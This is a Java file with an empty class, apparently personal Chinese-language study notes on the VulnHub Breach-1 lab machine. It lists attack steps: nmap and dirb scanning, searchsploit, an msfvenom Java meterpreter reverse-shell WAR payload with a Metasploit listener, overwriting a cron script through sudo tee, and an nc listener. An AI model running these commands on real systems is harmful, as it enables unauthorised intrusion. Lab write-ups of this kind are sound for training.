package com.asa.hack;

public class B {

	/**
	 * 
	 * 1、Base64、MD5解码
		2、CMS识别和漏洞搜索
		3、邮件信息泄露
		4、wireshark抓包数据分析
		5、证书解密HTTPS流量
		6、tomcat后台利用
		7、msf生成payload及监听
		8、Linux历史命令泄露
		9、图片隐写提取文字
		vulnhub.com/entry/breach-1,152/

	 * 
	 * 
	 * 一、端口扫描
	 * 
	 * 		nmap -T4 -A -v 192.168.2.120
	 * 
	 * 		如果显示所有端口都开了，说明做了保护
	 * 		靠猜？
	 * 
	 * 		MD5 32位			http://somd5.com/
	 * 		SHA-1 40位
	 * 		Base64 64位
	 * 		还是字典破解法，有点小失落，但也正常（CTF编码工具）
	 * 		
	 * 		impresscms	类型的，公共的cms之类的框架，其本身是存在漏洞的
	 * 
	 * 		msfconsole
	 * 		searchsploit impresscms		查指定的框架的漏洞
	 * 		
	 * 		
	 * 		keytool.exe	可以用来创建密钥证书，java自带的
	 * 		keytool -genkeypair -alias wuya -keyalg RSA -keystore d:\test\wuya.keystore -storetype pkcs12		创建证书
	 * 
	 * 		keytool -list -v -keystore d:\test\wuya.keystore		读取证书
	 * 		
	 * 		keytool -export -alias wuya -keystore D:\test\wuya.keystore -file D:\test\wuya.crt		导出成数字的证书
	 * 
	 * 		keytool -i mportkeystore -srckeystore D: \keystore -destkeystore D: \tomcat.p12 -deststoretype PKCS12 -srcalias tomcat

	 * 
	 * 
	 * 		如果能上传文件了
	 * 		（需要注意的是，这个不能跨权限，换句话说就是这个反弹只能反弹当前应用的权限的作者的）
	 * 		msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.110.128 lport=4444 -f war -o kali.war	java的反弹链接 的代码生成
	 * 
	 * 		msfconsole
	 * 		use exploit/multi/handler	反弹链接
	 * 		set payload java/meterpreter/reverse_tcp
	 * 		set LPORT 4444
	 * 		exploit
	 * 
	 * 
	 * 		
	 * 
	 * 
	 * 		dirb http://192.168.2.120
	 * 
	 * 
	 * 		su root		切换用户
	 * 		
	 * 		sudo -l	查看自己的权限，挺有用的
	 * 
	 * 
	 * 		电子图片中的信息
	 * 			strings asa.jpg
	 * 			exiftool * | grep -i -e 'File Name' -e 'Comment'		kali自带的查看文件注释的信息
	 * 
	 * 		
	 * 
	 * 		写定时任务
	 * 			如果已经有定时器sh脚本（下面是把tee的脚本覆盖到已经存在的tidyup.sh脚本中）
	 * 			cat shell.txt| sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
	 * 			
	 * 
	 * 		nc -lvvp 5555		监听自己的5555端口
	 * 
	 * 
	 * 
	 * 
	 * 		
	 * 
	 */
	
	
}
